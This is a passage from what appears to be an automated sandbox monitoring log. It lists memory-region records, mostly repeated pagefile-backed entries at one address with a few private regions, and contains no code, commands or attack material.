region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4429 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4430 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4431 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4432 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4499 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4500 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 4501 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4609 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4610 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 4611 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 